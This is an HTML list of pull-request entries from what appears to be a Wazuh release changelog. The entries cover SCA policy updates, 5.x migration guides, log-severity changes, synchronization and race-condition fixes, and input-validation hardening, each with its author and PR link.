<li>Fix <code>detect-changes</code> glob to honour <code>**</code> recursively and extract logic into a reusable action by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544605284" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36617" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36617/hovercard" href="https://github.com/wazuh/wazuh/pull/36617">#36617</a></li>
<li>Merge merge-4.14.6-into-4.14.7 into 4.14.7 [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546868343" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36623" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36623/hovercard" href="https://github.com/wazuh/wazuh/pull/36623">#36623</a></li>
<li>Reduce log noise when engine has no synchronized ruleset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505198128" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36356" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36356/hovercard" href="https://github.com/wazuh/wazuh/pull/36356">#36356</a></li>
<li>Update test modules paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549542116" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36668" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36668/hovercard" href="https://github.com/wazuh/wazuh/pull/36668">#36668</a></li>
<li>Only download external deps when required by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486894083" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36244" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36244/hovercard" href="https://github.com/wazuh/wazuh/pull/36244">#36244</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4548874786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36664" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36664/hovercard" href="https://github.com/wazuh/wazuh/pull/36664">#36664</a></li>
<li>Mail forwarding and reporting 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li>Added Ubuntu 26.04's SCA policy in the SPECS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562694437" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36712" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36712/hovercard" href="https://github.com/wazuh/wazuh/pull/36712">#36712</a></li>
<li>Preliminary support new OSs - Ubuntu 26.04 - Add SCA content by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AwwalQuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AwwalQuan">@AwwalQuan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561732273" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36708" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36708/hovercard" href="https://github.com/wazuh/wazuh/pull/36708">#36708</a></li>
<li>Safeguards to inventory sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534767894" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36469" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36469/hovercard" href="https://github.com/wazuh/wazuh/pull/36469">#36469</a></li>
<li>Improve the method of detecting duplicates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504512576" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36344" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36344/hovercard" href="https://github.com/wazuh/wazuh/pull/36344">#36344</a></li>
<li>Fix race condition preventing inventory synchronization after agent reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551769345" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36682" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36682/hovercard" href="https://github.com/wazuh/wazuh/pull/36682">#36682</a></li>
<li>Added API integration tests workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472493573" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36196" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36196/hovercard" href="https://github.com/wazuh/wazuh/pull/36196">#36196</a></li>
<li>Fix non-atomic write for <code>file_status.json</code> in logcollector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565514906" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36722" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36722/hovercard" href="https://github.com/wazuh/wazuh/pull/36722">#36722</a></li>
<li>Make agent-info shutdown waits interruptible by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4564093587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36719" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36719/hovercard" href="https://github.com/wazuh/wazuh/pull/36719">#36719</a></li>
<li>Validate IP address in ip-customblock active response by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570134407" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36730" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36730/hovercard" href="https://github.com/wazuh/wazuh/pull/36730">#36730</a></li>
<li>wazuh-agent remains active after uninstall on Fedora 44 / DNF5 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568853035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36727/hovercard" href="https://github.com/wazuh/wazuh/pull/36727">#36727</a></li>
<li>Use per-target rpath and remove redundant LD_LIBRARY_PATH/WAZUH_ENGINE_GROUP exports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531005682" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36455" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36455/hovercard" href="https://github.com/wazuh/wazuh/pull/36455">#36455</a></li>
<li>Fix changelog chronological order and update bumper script by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4569560130" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36729" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36729/hovercard" href="https://github.com/wazuh/wazuh/pull/36729">#36729</a></li>
<li>Monitoring a symlink without follow_symbolic_link by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4444803761" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36081" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36081/hovercard" href="https://github.com/wazuh/wazuh/pull/36081">#36081</a></li>
<li>SCA policies migration guide from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550901765" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36671" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36671/hovercard" href="https://github.com/wazuh/wazuh/pull/36671">#36671</a></li>
<li>Fix 5x  wazuhdb integration tests  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562864780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36713" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36713/hovercard" href="https://github.com/wazuh/wazuh/pull/36713">#36713</a></li>
<li>Downgrade transient manager-reported sync failures logs to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576461814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36744" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36744/hovercard" href="https://github.com/wazuh/wazuh/pull/36744">#36744</a></li>
<li>Show sca timouts as Not Run by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488962491" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36258" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36258/hovercard" href="https://github.com/wazuh/wazuh/pull/36258">#36258</a></li>
<li>Authd workflow creation for 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522600046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36404" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36404/hovercard" href="https://github.com/wazuh/wazuh/pull/36404">#36404</a></li>
<li>Adapt remoted tests to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541524155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36609" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36609/hovercard" href="https://github.com/wazuh/wazuh/pull/36609">#36609</a></li>
<li>Update unclassified event criteria by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551542627" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36681" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36681/hovercard" href="https://github.com/wazuh/wazuh/pull/36681">#36681</a></li>
<li>use safeloader in yaml file loader by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582767203" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36753" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36753/hovercard" href="https://github.com/wazuh/wazuh/pull/36753">#36753</a></li>
<li>Downgrade expected modulesd socket warnings/errors during agent restart to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583215822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36755" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36755/hovercard" href="https://github.com/wazuh/wazuh/pull/36755">#36755</a></li>
<li>Documentation: Ciscat and openscap migration to SCA by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4566095438" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36723" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36723/hovercard" href="https://github.com/wazuh/wazuh/pull/36723">#36723</a></li>
<li>Document the deprecation of OSquery in order to use IT Hygiene in version 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583642489" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36756" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36756/hovercard" href="https://github.com/wazuh/wazuh/pull/36756">#36756</a></li>
<li>Preserve wazuh-syscheckd Full Disk Access attribution on macOS reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583103632" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36754" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36754/hovercard" href="https://github.com/wazuh/wazuh/pull/36754">#36754</a></li>
<li>Normalize severity Msg  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588829137" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36759" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36759/hovercard" href="https://github.com/wazuh/wazuh/pull/36759">#36759</a></li>
<li>Agent Groups 5x Migration Guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568131074" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36726" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36726/hovercard" href="https://github.com/wazuh/wazuh/pull/36726">#36726</a></li>
<li>Add NULL validation for optional FlatBuffer fields in inventory_sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598119007" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36773" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36773/hovercard" href="https://github.com/wazuh/wazuh/pull/36773">#36773</a></li>
<li>Fix agent keepalive scheduling after system clock rollback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503704905" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36338" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36338/hovercard" href="https://github.com/wazuh/wazuh/pull/36338">#36338</a></li>
<li>Create integratord migration guide to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li>Syslog output (csyslogd) 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gonzaarancibia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gonzaarancibia">@gonzaarancibia</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573759572" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36741" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36741/hovercard" href="https://github.com/wazuh/wazuh/pull/36741">#36741</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596517095" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36767" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36767/hovercard" href="https://github.com/wazuh/wazuh/pull/36767">#36767</a></li>
<li>Migration documentation: syslog input alternative by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613452406" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36781" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36781/hovercard" href="https://github.com/wazuh/wazuh/pull/36781">#36781</a></li>
<li>Drop libcrypt dependency from Python dep by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a></li>
<li>Change duplicated link to intented one by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619366060" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36794" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36794/hovercard" href="https://github.com/wazuh/wazuh/pull/36794">#36794</a></li>
<li>Add centralized input validation for active response framework by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578234540" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36745" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36745/hovercard" href="https://github.com/wazuh/wazuh/pull/36745">#36745</a></li>
<li>Fix sca check for etc/shadow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619503472" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36795" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36795/hovercard" href="https://github.com/wazuh/wazuh/pull/36795">#36795</a></li>
<li>Align remoted metrics shipper with new field names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572800781" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36740" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36740/hovercard" href="https://github.com/wazuh/wazuh/pull/36740">#36740</a></li>
<li>Fix wrap PolicyBanner stat in 'sh -c' so glob expands in macOS SCA check 41062 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615585186" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36783" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36783/hovercard" href="https://github.com/wazuh/wazuh/pull/36783">#36783</a></li>
<li>Bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623354993" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36801" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36801/hovercard" href="https://github.com/wazuh/wazuh/pull/36801">#36801</a></li>
<li>Defer module coordination while FIM first sync is in progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591815012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36762" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36762/hovercard" href="https://github.com/wazuh/wazuh/pull/36762">#36762</a></li>
<li>Revert "Bump main branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623582882" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36802" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36802/hovercard" href="https://github.com/wazuh/wazuh/pull/36802">#36802</a></li>
<li>Change log severity for recoverable and expected conditions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615970610" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36786" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36786/hovercard" href="https://github.com/wazuh/wazuh/pull/36786">#36786</a></li>
<li>Prevent data race in schema validator factory concurrent initialization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616512800" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36789" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36789/hovercard" href="https://github.com/wazuh/wazuh/pull/36789">#36789</a></li>
<li>Schema generation for dotted and nested field mappings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536240667" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36473" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36473/hovercard" href="https://github.com/wazuh/wazuh/pull/36473">#36473</a></li>
<li>Engine support null values in schema validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535313001" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36470" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36470/hovercard" href="https://github.com/wazuh/wazuh/pull/36470">#36470</a></li>
